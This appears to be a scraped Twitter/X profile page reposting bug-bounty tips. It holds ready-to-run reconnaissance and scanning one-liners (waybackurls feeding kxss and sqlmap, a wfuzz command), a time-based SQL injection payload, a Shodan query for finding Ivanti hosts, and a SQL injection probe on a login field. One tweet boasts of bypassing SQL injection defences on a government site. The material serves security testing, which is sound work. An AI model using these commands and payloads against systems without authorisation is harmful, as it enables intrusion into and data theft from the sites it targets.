![WllGates's tweet photo. 🚨 XSS Hunting from WaybackURLS 🔍
waybackurls target | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls-xss.txt | sort -u -o urls-xss.txt && cat urls-xss.txt | kxss
credit : @gudetama_bf
#bugbountytips #bugbounty https://t.co/boXDrkxpLD](https://pbs.twimg.com/media/GM0H8e8XoAA1L-X.jpg)
Olivia
Online
rndtx
@nullrndtx
I'm a bit of a hacker fanatic and know a fair bit about that industry and cyber crime and cyber warfare.
Jakarta Capital Region
Joined October 2022
6 Following
1 Followers
288 Posts
Find SSRF , LFI , XSS using httpx , waybackurls , gf , gau , qsreplace by @HackTube5
Link: https://t.co/T8FeQ93nBA
#bugbounty
🔎 Recursive Fuzzing with WFUZZ 💻
wfuzz -c -z file,wordlist -R 3 --sc 301,200 target/FUZZ
#bugbountytips #bugbounty
Writeup: 23000$ for Authentication Bypass & File Upload & Arbitrary File Overwrite
https://t.co/i4usLz5s38
credit: @h4x0r_dz
#bugbountytips #bugbounty
The writeup is ready 📝
(Subdomain Fuzzing worth 35k bounty!) 💰
I tried my best to make everything clear, and useful ✨
Enjoy 😊
credit: @XHackerx007
#bugbountytips #Hacking
https://t.co/BlDsRQ9bTL
🚨 XSS Hunting from WaybackURLS 🔍
waybackurls target | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls-xss.txt | sort -u -o urls-xss.txt && cat urls-xss.txt | kxss
credit : @gudetama_bf
#bugbountytips #bugbounty
![WllGates's tweet photo. 🚨 XSS Hunting from WaybackURLS 🔍
waybackurls target | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls-xss.txt | sort -u -o urls-xss.txt && cat urls-xss.txt | kxss
credit : @gudetama_bf
#bugbountytips #bugbounty https://t.co/boXDrkxpLD](https://pbs.twimg.com/media/GM0H8fHXYAEWCpe.jpg)
Sql Injection
Payload : -10'XOR(if(now()=sysdate(),sleep(20),0))XOR'Z
Credit:@lu3ky13
#bugbountytips #BugBounty
Path Traversal Affecting Multiple CData Products
CRITICAL
SRC: https://t.co/eklHDDPyWN
PoC: 👇
💸 My new writeup: 23000$ for Authentication Bypass & File Upload & Arbitrary File Overwrite
credit: @h4x0r_dz
#bugbountytips
https://t.co/m1U1ZtcIUd
🤔Many people have often asked me how to search for "ivanti", for shodan you can search as title:"Ivanti Connect" hostname:"target.*"
credit: @ynsmroztas
#bugbountytip #bugbounty
Bug - Email Verification Bypass via Oauth Misconfig
Yay, I was awarded a $400 bounty on @Hacker0x01! https://t.co/57W5BzWHPH #TogetherWeHitHarder
Bypassed SQLi in Philippine Government,Ghauri is Excellient tool for finding timebased blind sqli..
🔥 Found SQL Injection to Account Takeover Manually :)
1. Enter mobile number to login intercept
{"mobile_number":"8888888888"} >> 200
{"mobile_number":"8888888888'"} >> 500
{"mobile_number":"8888888888''"} >> 200
credit: @bbr_bug
#bugbountytips
NucleiScanner = Nuclei + Subfinder + Gau + Paramspider + httpx (Automation)
Link: https://t.co/vcTYdr5vwr
#NucleiScanner #NucleiFuzzer #Automation
If you see android:exported="true" in AndroidManifest.xml in Android pentests, you should definitely try the intent injection method, this may give you ssrf, exfiltration sensitive data, rce. 🥰🌹🥳
#BugBounty #bugbountytips
CVE-2024-2961 – glibc Vulnerability Opens Door to PHP Attacks https://t.co/3Y53JvCLxA
💻 Random account takeover via misconfigured OAuth 💻
👉 Writeup 🖇️ :
https://t.co/weVqiUHMtq
SQLMap from Waybackurls
waybackurls target | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt && cat urls.txt | xargs -I{} sqlmap --technique=T --batch -u "{}"
![bbr_bug's tweet photo. SQLMap from Waybackurls
waybackurls target | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt && cat urls.txt | xargs -I{} sqlmap --technique=T --batch -u "{}" https://t.co/yxzt8okWeP](https://pbs.twimg.com/media/GLR0Gc6WcAIQmhM.png)
I've made a simple and effective bash script that leverages the power of @KN0X55 API for mass XSS scanning🔥.
https://t.co/GHj4xheERL
#BugBounty #KNOXSS #xss
Most Popular Users
Elon Musk 
@elonmusk
240.3M followers
Barack Obama
@barackobama
119.3M followers
Donald J. Trump
@realdonaldtrump
111.6M followers
Cristiano Ronaldo
@cristiano
109.9M followers
Narendra Modi
@narendramodi
106.9M followers
Rihanna
@rihanna
97.5M followers
NASA
@nasa
92.1M followers
Justin Bieber
@justinbieber
90.8M followers
KATY PERRY
@katyperry
87.3M followers
Taylor Swift
@taylorswift13
81.1M followers
Lady Gaga
@ladygaga
72.7M followers
Kim Kardashian
@kimkardashian
69.6M followers
Virat Kohli
@imvkohli
69.3M followers
YouTube
@youtube
68.6M followers
Bill Gates
@billgates
63.7M followers
The Ellen Show
@theellenshow
62.5M followers
Neymar Jr
@neymarjr
62M followers
CNN
@cnn
61.9M followers
X
@x
60.9M followers
Selena Gomez
@selenagomez
60.4M followers